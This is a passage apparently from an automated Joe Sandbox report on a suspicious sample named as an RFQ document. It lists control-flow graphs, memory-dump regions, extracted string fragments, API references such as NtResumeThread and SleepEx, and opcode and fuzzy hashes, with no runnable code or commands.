68497->68023 68499 74aa9e8 68498->68499 68508 74aaa2e 68499->68508 68513 74aaa30 68499->68513 68500 74aaa12 68500->68029 68504 74aa9f1 68503->68504 68506 74aaa2e SleepEx 68504->68506 68507 74aaa30 SleepEx 68504->68507 68505 74aaa12 68505->68029 68506->68505 68507->68505 68510 74aaa30 68508->68510 68509 74aaade 68509->68500 68510->68509 68511 9872088 SleepEx 68510->68511 68512 9872078 SleepEx 68510->68512 68511->68510 68512->68510 68515 74aaa4c 68513->68515 68514 74aaade 68514->68500 68515->68514 68516 9872088 SleepEx 68515->68516 68517 9872078 SleepEx 68515->68517 68516->68515 68517->68515 68519 74a9ca8 68518->68519 68523 74a9dc4 2 API calls 68519->68523 68530 74a9cee 68519->68530 68535 74a9cf0 68519->68535 68520 74a9cd2 68520->68075 68523->68520 68525 74a9cbf 68524->68525 68527 74a9cee SleepEx 68525->68527 68528 74a9cf0 SleepEx 68525->68528 68529 74a9dc4 2 API calls 68525->68529 68526 74a9cd2 68526->68075 68527->68526 68528->68526 68529->68526 68531 74a9cf0 68530->68531 68532 74a9da1 68531->68532 68533 9872088 SleepEx 68531->68533 68534 9872078 SleepEx 68531->68534 68532->68520 68533->68531 68534->68531 68537 74a9d0c 68535->68537 68536 74a9da1 68536->68520 68537->68536 68538 9872088 SleepEx 68537->68538 68539 9872078 SleepEx 68537->68539 68538->68537 68539->68537

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 592 9940040-994006e 595 9940075-9940197 592->595 596 9940070 592->596 600 9940199-99401af 595->600 601 99401bb-99401c7 595->601 596->595 879 99401b5 call 9942bd0 600->879 880 99401b5 call 9942bc0 600->880 602 99401ce-99401d3 601->602 603 99401c9 601->603 605 99401d5-99401e1 602->605 606 994020b-9940254 602->606 603->602 607 99401e3 605->607 608 99401e8-9940206 605->608 614 9940256 606->614 615 994025b-9940520 606->615 607->608 609 994196f-9941975 608->609 611 9941977-9941997 609->611 612 99419a0 609->612 611->612 617 99419a1 612->617 614->615 642 9940f50-9940f5c 615->642 617->617 643 9940525-9940531 642->643 644 9940f62-9940f9a 642->644 645 9940533 643->645 646 9940538-994065d 643->646 653 9941074-994107a 644->653 645->646 681 994069d-9940726 646->681 682 994065f-9940697 646->682 654 9941080-99410b8 653->654 655 9940f9f-994101c 653->655 665 9941416-994141c 654->665 670 994101e-9941022 655->670 671 994104f-9941071 655->671 668 9941422-994146a 665->668 669 99410bd-99412bf 665->669 678 99414e5-99414f1 668->678 679 994146c-99414df 668->679 762 99412c5-9941359 669->762 763 994135e-9941362 669->763 670->671 674 9941024-994104c 670->674 671->653 674->671 684 99414f8-9941530 678->684 679->678 709 9940735-99407b9 681->709 710 9940728-9940730 681->710 682->681 699 9941939-994193f 684->699 702 9941535-99415b7 699->702 703 9941945-994196d 699->703 722 99415df-99415eb 702->722 723 99415b9-99415d4 702->723 703->609 736 99407c8-994084c 709->736 737 99407bb-99407c3 709->737 712 9940f41-9940f4d 710->712 712->642 725 99415f2-99415fe 722->725 726 99415ed 722->726 723->722 727 9941600-994160c 725->727 728 9941611-9941620 725->728 726->725 732 9941920-9941936 727->732 733 9941622 728->733 734 9941629-9941901 728->734 732->699 733->734 738 99417f6-994185e 733->738 739 994169d-9941715 733->739 740 994162f-9941698 733->740 741 9941788-99417f1 733->741 742 994171a-9941783 733->742 769 994190c-9941918 734->769 785 994084e-9940856 736->785 786 994085b-99408df 736->786 737->712 774 99418d2-99418d8 738->774 739->769 740->769 741->769 742->769 787 99413fd-9941413 762->787 770 9941364-99413bd 763->770 771 99413bf-99413fc 763->771 769->732 770->787 771->787 777 9941860-99418be 774->777 778 99418da-99418e4 774->778 790 99418c5-99418cf 777->790 791 99418c0 777->791 778->769 785->712 800 99408e1-99408e9 786->800 801 99408ee-9940972 786->801 787->665 790->774 791->790 800->712 807 9940974-994097c 801->807 808 9940981-9940a05 801->808 807->712 814 9940a14-9940a98 808->814 815 9940a07-9940a0f 808->815 821 9940aa7-9940b2b 814->821 822 9940a9a-9940aa2 814->822 815->712 828 9940b2d-9940b35 821->828 829 9940b3a-9940bbe 821->829 822->712 828->712 835 9940bc0-9940bc8 829->835 836 9940bcd-9940c51 829->836 835->712 842 9940c60-9940ce4 836->842 843 9940c53-9940c5b 836->843 849 9940ce6-9940cee 842->849 850 9940cf3-9940d77 842->850 843->712 849->712 856 9940d86-9940e0a 850->856 857 9940d79-9940d81 850->857 863 9940e0c-9940e14 856->863 864 9940e19-9940e9d 856->864 857->712 863->712 870 9940eac-9940f30 864->870 871 9940e9f-9940ea7 864->871 877 9940f32-9940f3a 870->877 878 9940f3c-9940f3e 870->878 871->712 877->712 878->712 879->601 880->601
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 2$d_{$$^q
                                                                                                                          • API String ID: 0-735896107
                                                                                                                          • Opcode ID: 2658ab4eb4d2fa5bcd90751b88a51f38101c07f7571b6ca7920e89c9ca089ff1
                                                                                                                          • Instruction ID: e0043284486d23032765cde0b49bf855b1dbc78535711d76f060c55d5560a896
                                                                                                                          • Opcode Fuzzy Hash: 2658ab4eb4d2fa5bcd90751b88a51f38101c07f7571b6ca7920e89c9ca089ff1
                                                                                                                          • Instruction Fuzzy Hash: 8FE2E7B4E012288FDB65DF68D884B9ABBF6FB89304F1081E9D509A7354DB309E85CF51

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1487 74a3598-74a35b9 1488 74a35bb 1487->1488 1489 74a35c0-74a3650 call 74a40ea 1487->1489 1488->1489 1494 74a3656-74a36a3 1489->1494 1497 74a36b2 1494->1497 1498 74a36a5-74a36b0 1494->1498 1499 74a36bc-74a37d7 1497->1499 1498->1499 1510 74a37e9-74a3814 1499->1510 1511 74a37d9-74a37df 1499->1511 1512 74a3fc8-74a3fe4 1510->1512 1511->1510 1513 74a3fea-74a4005 1512->1513 1514 74a3819-74a397c call 74a2528 1512->1514 1525 74a398e-74a3b0b 1514->1525 1526 74a397e-74a3984 1514->1526 1536 74a3b0d-74a3b11 1525->1536 1537 74a3b70-74a3b7a 1525->1537 1526->1525 1538 74a3b19-74a3b6b 1536->1538 1539 74a3b13-74a3b14 1536->1539 1540 74a3da1-74a3dc0 1537->1540 1541 74a3e46-74a3eb1 1538->1541 1539->1541 1542 74a3b7f-74a3cc5 call 74a2528 1540->1542 1543 74a3dc6-74a3df0 1540->1543 1560 74a3ec3-74a3f0e 1541->1560 1561 74a3eb3-74a3eb9 1541->1561 1572 74a3d9a-74a3d9b 1542->1572 1573 74a3ccb-74a3d97 call 74a2528 1542->1573 1549 74a3df2-74a3e40 1543->1549 1550 74a3e43-74a3e44 1543->1550 1549->1550 1550->1541 1563 74a3fad-74a3fc5 1560->1563 1564 74a3f14-74a3fac 1560->1564 1561->1560 1563->1512 1564->1563 1572->1540 1573->1572
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: fcq$8
                                                                                                                          • API String ID: 0-89531850
                                                                                                                          • Opcode ID: 330a4f9c5a5a1877db0b15d22709be7f7ec1766f51e0d97125ecfd8d6c0b0994
                                                                                                                          • Instruction ID: f756874afc6bfd462cc02b8bdcca1ffb367d1a79f9b61833cedc3e86e6287562
                                                                                                                          • Opcode Fuzzy Hash: 330a4f9c5a5a1877db0b15d22709be7f7ec1766f51e0d97125ecfd8d6c0b0994
                                                                                                                          • Instruction Fuzzy Hash: 7D52E675E01229DFDB64DF68C890BD9B7B2FB99304F1481AAD909A7354DB30AE81CF50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: fcq$h
                                                                                                                          • API String ID: 0-1849521214
                                                                                                                          • Opcode ID: 9bb3be93a068a327ea96199cc57a3cbdbb3057e66d7575002a722d5a60f35c10
                                                                                                                          • Instruction ID: 8dcfe4cf2eb30e428e352a565f1371d66b8be309ebdae069752a5084236e89a3
                                                                                                                          • Opcode Fuzzy Hash: 9bb3be93a068a327ea96199cc57a3cbdbb3057e66d7575002a722d5a60f35c10
                                                                                                                          • Instruction Fuzzy Hash: 7E712975E012289FEB54DF69C840BDABBB2FF89304F14C2AAD509A7254DB306E85CF51
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq
                                                                                                                          • API String ID: 0-149360118
                                                                                                                          • Opcode ID: 5837b8eb81346d7d847721092a351bf4383bbaa6c725f6ed39c50a6b949ce6a1
                                                                                                                          • Instruction ID: 79550d9cc678c4ac4d9225a324025389fc70235555b125741c75b63f196b1eb2
                                                                                                                          • Opcode Fuzzy Hash: 5837b8eb81346d7d847721092a351bf4383bbaa6c725f6ed39c50a6b949ce6a1
                                                                                                                          • Instruction Fuzzy Hash: 99328870A012568FCB15DFB9C49866EBBF2FF88300F64C569E85AD7391DB30A905CB81
                                                                                                                          APIs
                                                                                                                          • NtResumeThread.NTDLL(?,?), ref: 074AA8EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ResumeThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 947044025-0
                                                                                                                          • Opcode ID: a771fce8dd695b3e531f657488fbc5dee83aa7b94c2154adaf9b7ba422c32fb3
                                                                                                                          • Instruction ID: fddbbe4fa7b3d375098b758dd2afea531f2d7e6527608b5b27e2a00f82a5f08a
                                                                                                                          • Opcode Fuzzy Hash: a771fce8dd695b3e531f657488fbc5dee83aa7b94c2154adaf9b7ba422c32fb3
                                                                                                                          • Instruction Fuzzy Hash: AA41BDB8E012199FCB00DFA9D581AEEBBF1EB49310F24942AE915B7340C734A945CF94
                                                                                                                          APIs
                                                                                                                          • NtResumeThread.NTDLL(?,?), ref: 074AA8EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ResumeThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 947044025-0
                                                                                                                          • Opcode ID: 868d2b9985b7ea36436a31e4557c75012702afc7f3ec9eda65f14ab2bd0e8899
                                                                                                                          • Instruction ID: fede5f34465de3e1c134d526bcfe5fd716669c5ae084d68309df197429566a7b
                                                                                                                          • Opcode Fuzzy Hash: 868d2b9985b7ea36436a31e4557c75012702afc7f3ec9eda65f14ab2bd0e8899
                                                                                                                          • Instruction Fuzzy Hash: 4031AAB5D012589FCB10CFA9D980ADEFBF4BB49320F20942AE815B7310C734A946CF94
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044693538.0000000009870000.00000040.00000800.00020000.00000000.sdmp, Offset: 09870000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9870000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PH^q
                                                                                                                          • API String ID: 0-2549759414
                                                                                                                          • Opcode ID: a1098f37a29bb45ac923bed03f467804f94e2cf07d8459e31b8999e50f9a314f
                                                                                                                          • Instruction ID: 631f76ad25d94ae362d490ac42406f464f24cf5d0d5af93f4665755a9c98155c
                                                                                                                          • Opcode Fuzzy Hash: a1098f37a29bb45ac923bed03f467804f94e2cf07d8459e31b8999e50f9a314f
                                                                                                                          • Instruction Fuzzy Hash: 44D1D174E05318DFDB24CFA9C984BA9FBB2BB89308F1490A9D529E7354DB709985CF01
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044693538.0000000009870000.00000040.00000800.00020000.00000000.sdmp, Offset: 09870000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9870000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PH^q
                                                                                                                          • API String ID: 0-2549759414
                                                                                                                          • Opcode ID: 88dd23bb522511874ff22ffe62b25d9d675e4500c8d7947f4ab943d9c3515ed7
                                                                                                                          • Instruction ID: 1f554ec7b3097ef9e80aa86389e25b2d7c0d020355e483405a0577786884eb79
                                                                                                                          • Opcode Fuzzy Hash: 88dd23bb522511874ff22ffe62b25d9d675e4500c8d7947f4ab943d9c3515ed7
                                                                                                                          • Instruction Fuzzy Hash: 91D1D074E01218DFDB64CFA9C985BAAFBF2BB89308F1490A9D429E7354D7709985CF01
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a64e78031b441820f32a8ee1e25a666fffce94ac5eac64a326cf36bb9b446a44
                                                                                                                          • Instruction ID: 73492efea2b6a1848ce2acb7565a653a45acd737b7698d5f5339ec17c71cc6b1
                                                                                                                          • Opcode Fuzzy Hash: a64e78031b441820f32a8ee1e25a666fffce94ac5eac64a326cf36bb9b446a44
                                                                                                                          • Instruction Fuzzy Hash: 2D52B5B4A042288FCB65DF28C984B9ABBB6FB89305F1081D5D90DA7355DB30AE85CF51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e4a4e90b753a693105fcc4809500424ea322b5ba717754ffab5dc1a59e7e3770
                                                                                                                          • Instruction ID: 692ee745a0acc53c758a4eec71cf6bddbe34db851b9fbe52e5dacb1d7ffe466e
                                                                                                                          • Opcode Fuzzy Hash: e4a4e90b753a693105fcc4809500424ea322b5ba717754ffab5dc1a59e7e3770
                                                                                                                          • Instruction Fuzzy Hash: 2A8147B4E05218DFDB14CF99D940BEDBBF2BB9A304F1080AAD409AB394DB745A85DF10
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8dc11ae95d73332d7bb80879fdb93a447ebe80a65dba70d2ffa509d29da00808
                                                                                                                          • Instruction ID: eb524d5525afe871e02e94610d98ed2b475f793f6f11c45eba414a1efb85239c
                                                                                                                          • Opcode Fuzzy Hash: 8dc11ae95d73332d7bb80879fdb93a447ebe80a65dba70d2ffa509d29da00808
                                                                                                                          • Instruction Fuzzy Hash: 0F8148B8E05218DFDB14CF99D540BEDBBF2BB9A304F0090AAD409AB394DB745A85DF10
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b8ddb30439cdcf9c8892aeaa7e1e797c074f0d3c6b00647e78d3779e495d7d58
                                                                                                                          • Instruction ID: 990857f7569e77046ebb76ad7a22b5a9a6fd58fbb1c1cea6afa07a87aa648b13
                                                                                                                          • Opcode Fuzzy Hash: b8ddb30439cdcf9c8892aeaa7e1e797c074f0d3c6b00647e78d3779e495d7d58
                                                                                                                          • Instruction Fuzzy Hash: 70612A71E05A588BDB19CF6BDC4068ABFF3AFC9305F18C0AAD508AB265DB341985CF51
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q$4'^q$4'^q$4'^q$p<^q$p<^q$$^q$$^q$$^q
                                                                                                                          • API String ID: 0-3172493745
                                                                                                                          • Opcode ID: dfe3fc2c14d90b5b5b8d3419b95086328dff11b65d135a7ff2fa161146e1536c
                                                                                                                          • Instruction ID: 4aec82f2e7fd9ea6c484da0b3f4e2fb409d536b60ce79c4b9e0a71ca278e7fa7
                                                                                                                          • Opcode Fuzzy Hash: dfe3fc2c14d90b5b5b8d3419b95086328dff11b65d135a7ff2fa161146e1536c
                                                                                                                          • Instruction Fuzzy Hash: C41248B1B0422BAFCB15CF29C994AAA7BF1BFC521AF1484A6D405CF261DB31CA45C791

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 177 7ca0428-7ca044b 178 7ca05a0-7ca05ee 177->178 179 7ca0451-7ca0456 177->179 196 7ca073b-7ca076d 178->196 197 7ca05f4-7ca05f9 178->197 180 7ca0458-7ca045e 179->180 181 7ca046e-7ca0472 179->181 183 7ca0462-7ca046c 180->183 184 7ca0460 180->184 185 7ca0478-7ca047a 181->185 186 7ca0550-7ca055a 181->186 183->181 184->181 187 7ca0499 185->187 188 7ca047c-7ca0497 185->188 189 7ca0568-7ca056e 186->189 190 7ca055c-7ca0565 186->190 191 7ca049b-7ca049d 187->191 188->191 193 7ca0570-7ca0572 189->193 194 7ca0574-7ca0580 189->194 191->186 200 7ca04a3-7ca04a5 191->200 199 7ca0582-7ca059d 193->199 194->199 214 7ca07ce-7ca07d8 196->214 215 7ca076f-7ca078c 196->215 201 7ca05fb-7ca0601 197->201 202 7ca0611-7ca0615 197->202 200->186 204 7ca04ab-7ca04b4 200->204 205 7ca0603 201->205 206 7ca0605-7ca060f 201->206 207 7ca061b-7ca061d 202->207 208 7ca06e7-7ca06f1 202->208 204->186 226 7ca04ba-7ca04d6 204->226 205->202 206->202 212 7ca061f-7ca062b 207->212 213 7ca062d 207->213 216 7ca06ff-7ca0705 208->216 217 7ca06f3-7ca06fc 208->217 222 7ca062f-7ca0631 212->222 213->222 219 7ca07da-7ca07de 214->219 220 7ca07e1-7ca07e7 214->220 232 7ca081d-7ca0822 215->232 233 7ca0792-7ca0798 215->233 223 7ca070b-7ca0717 216->223 224 7ca0707-7ca0709 216->224 227 7ca07e9-7ca07eb 220->227 228 7ca07ed-7ca07f9 220->228 222->208 229 7ca0637-7ca0639 222->229 231 7ca0719-7ca0738 223->231 224->231 240 7ca04da-7ca04e6 226->240 241 7ca04d8 226->241 236 7ca07fb-7ca081a 227->236 228->236 229->208 237 7ca063f-7ca0643 229->237 232->233 238 7ca079a 233->238 239 7ca079c-7ca07a8 233->239 237->208 244 7ca0649-7ca064b 237->244 245 7ca07aa-7ca07c8 238->245 239->245 246 7ca04e8-7ca04f3 240->246 241->246 248 7ca064d-7ca0653 244->248 249 7ca0665-7ca066c 244->249 245->214 263 7ca050b-7ca054d 246->263 264 7ca04f5-7ca04fb 246->264 254 7ca0657-7ca0663 248->254 255 7ca0655 248->255 256 7ca0673-7ca0675 249->256 254->249 255->249 260 7ca068d-7ca06e4 256->260 261 7ca0677-7ca067d 256->261 265 7ca067f 261->265 266 7ca0681-7ca0683 261->266 268 7ca04ff-7ca0501 264->268 269 7ca04fd 264->269 265->260 266->260 268->263 269->263
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q$4'^q$4'^q$4'^q$`Bbk$$^q$$^q$$^q
                                                                                                                          • API String ID: 0-3069137555
                                                                                                                          • Opcode ID: 4b028e0c6cd07f20c1d9ab1f92ad633fbca1c2eea2f7ad99c25178e0b895bdb7
                                                                                                                          • Instruction ID: 96657faa949c91c768531bdd40f53f67b14b92951393fc86ceec3a001164deed
                                                                                                                          • Opcode Fuzzy Hash: 4b028e0c6cd07f20c1d9ab1f92ad633fbca1c2eea2f7ad99c25178e0b895bdb7
                                                                                                                          • Instruction Fuzzy Hash: AAA13CB1B04207AFCF254B6998447BABBE1AFC525AF14847BD805CB251FB32C9C5CB91

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 271 7ca1e48-7ca1e6b 272 7ca1fbc-7ca2045 271->272 273 7ca1e71-7ca1e76 271->273 291 7ca204b-7ca2050 272->291 292 7ca2196-7ca21dd 272->292 274 7ca1e78-7ca1e7e 273->274 275 7ca1e8e-7ca1e92 273->275 277 7ca1e82-7ca1e8c 274->277 278 7ca1e80 274->278 279 7ca1e98-7ca1e9a 275->279 280 7ca1f69-7ca1f73 275->280 277->275 278->275 279->280 283 7ca1ea0-7ca1ea4 279->283 281 7ca1f81-7ca1f87 280->281 282 7ca1f75-7ca1f7e 280->282 287 7ca1f89-7ca1f8b 281->287 288 7ca1f8d-7ca1f99 281->288 284 7ca1ea6-7ca1ec2 283->284 285 7ca1ec4 283->285 290 7ca1ec6-7ca1ec8 284->290 285->290 293 7ca1f9b-7ca1fb9 287->293 288->293 290->280 295 7ca1ece-7ca1ed7 290->295 296 7ca2068-7ca206c 291->296 297 7ca2052-7ca2058 291->297 319 7ca232d-7ca233e 292->319 320 7ca21e3-7ca21e8 292->320 295->280 314 7ca1edd-7ca1ef0 295->314 302 7ca2072-7ca2074 296->302 303 7ca2146-7ca2150 296->303 300 7ca205a 297->300 301 7ca205c-7ca2066 297->301 300->296 301->296 309 7ca2076-7ca2087 302->309 310 7ca20b7 302->310 307 7ca215e-7ca2164 303->307 308 7ca2152-7ca215b 303->308 316 7ca216a-7ca2176 307->316 317 7ca2166-7ca2168 307->317 309->292 323 7ca208d-7ca2095 309->323 313 7ca20b9-7ca20bb 310->313 313->303 321 7ca20c1-7ca20c3 313->321 347 7ca1ef5-7ca1ef7 314->347 322 7ca2178-7ca2193 316->322 317->322 324 7ca21ea-7ca21f0 320->324 325 7ca2200-7ca2204 320->325 326 7ca20dd-7ca20e9 321->326 327 7ca20c5-7ca20cb 321->327 332 7ca20ad-7ca20b5 323->332 333 7ca2097-7ca209d 323->333 336 7ca21f2 324->336 337 7ca21f4-7ca21fe 324->337 330 7ca220a-7ca220c 325->330 331 7ca22dd-7ca22e7 325->331 350 7ca20eb-7ca20f1 326->350 351 7ca2101-7ca2143 326->351 338 7ca20cf-7ca20db 327->338 339 7ca20cd 327->339 340 7ca220e-7ca221f 330->340 341 7ca224f 330->341 345 7ca22e9-7ca22f2 331->345 346 7ca22f5-7ca22fb 331->346 332->313 343 7ca209f 333->343 344 7ca20a1-7ca20ab 333->344 336->325 337->325 338->326 339->326 340->319 369 7ca2225-7ca222d 340->369 353 7ca2251-7ca2253 341->353 343->332 344->332 348 7ca22fd-7ca22ff 346->348 349 7ca2301-7ca230d 346->349 356 7ca1ef9-7ca1eff 347->356 357 7ca1f0f-7ca1f66 347->357 360 7ca230f-7ca232a 348->360 349->360 362 7ca20f3 350->362 363 7ca20f5-7ca20f7 350->363 353->331 367 7ca2259-7ca225b 353->367 358 7ca1f03-7ca1f05 356->358 359 7ca1f01 356->359 358->357 359->357 362->351 363->351 370 7ca225d-7ca2263 367->370 371 7ca2275-7ca2280 367->371 375 7ca222f-7ca2235 369->375 376 7ca2245-7ca224d 369->376 372 7ca2267-7ca2273 370->372 373 7ca2265 370->373 381 7ca2298-7ca22da 371->381 382 7ca2282-7ca2288 371->382 372->371 373->371 378 7ca2239-7ca2243 375->378 379 7ca2237 375->379 376->353 378->376 379->376 384 7ca228a 382->384 385 7ca228c-7ca228e 382->385 384->381 385->381
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                          • API String ID: 0-2822668367
                                                                                                                          • Opcode ID: 2e36ff7f524d029ae4e48811ab0ffe443275127693fde94661fe225c65998327
                                                                                                                          • Instruction ID: 32db16950b010ef486719aa289bc85a2a0501145d2d48fd56e081b86b960b4ce
                                                                                                                          • Opcode Fuzzy Hash: 2e36ff7f524d029ae4e48811ab0ffe443275127693fde94661fe225c65998327
                                                                                                                          • Instruction Fuzzy Hash: 7EC16BB1B0421BDFCB148B69C8842AABBF2BFC5226F18C1BAC505CB255EB31C945C751

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 388 9931c20-9931c48 390 9931d34-9931d58 388->390 391 9931c4e-9931c52 388->391 399 9931d5f-9931d83 390->399 392 9931c66-9931c6a 391->392 393 9931c54-9931c60 391->393 394 9931c70-9931c87 392->394 395 9931d8a-9931dae 392->395 393->392 393->399 406 9931c9b-9931c9f 394->406 407 9931c89-9931c95 394->407 413 9931db5-9931e0a 395->413 399->395 410 9931ca1-9931cba 406->410 411 9931ccb-9931ce4 406->411 407->406 407->413 410->411 420 9931cbc-9931cbf 410->420 421 9931ce6-9931d0a 411->421 422 9931d0d-9931d22 411->422 431 9931e42-9931e66 413->431 432 9931e0c-9931e2c 413->432 424 9931cc8 420->424 428 9931d2d-9931d31 422->428 424->411 440 9931e6d-9931ec2 431->440 439 9931e2e-9931e3f 432->439 432->440 446 9931f69-9931fb7 440->446 447 9931ec8-9931ed4 440->447 459 9931fe7-9931fed 446->459 460 9931fb9-9931fdd 446->460 450 9931ed6-9931edd 447->450 451 9931ede-9931ef2 447->451 455 9931f61-9931f68 451->455 456 9931ef4-9931f19 451->456 466 9931f1b-9931f35 456->466 467 9931f5c-9931f5f 456->467 463 9931fff-993200e 459->463 464 9931fef-9931ffc 459->464 460->459 462 9931fdf 460->462 462->459 466->467 469 9931f37-9931f40 466->469 467->455 467->456 470 9931f42-9931f45 469->470 471 9931f4f-9931f5b 469->471 470->471
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq$(bq$(bq$(bq$(bq
                                                                                                                          • API String ID: 0-2298650571
                                                                                                                          • Opcode ID: f8dfa464195414d9eb01cc5feb870ba547f60591774a774127a5efe21f2342cb
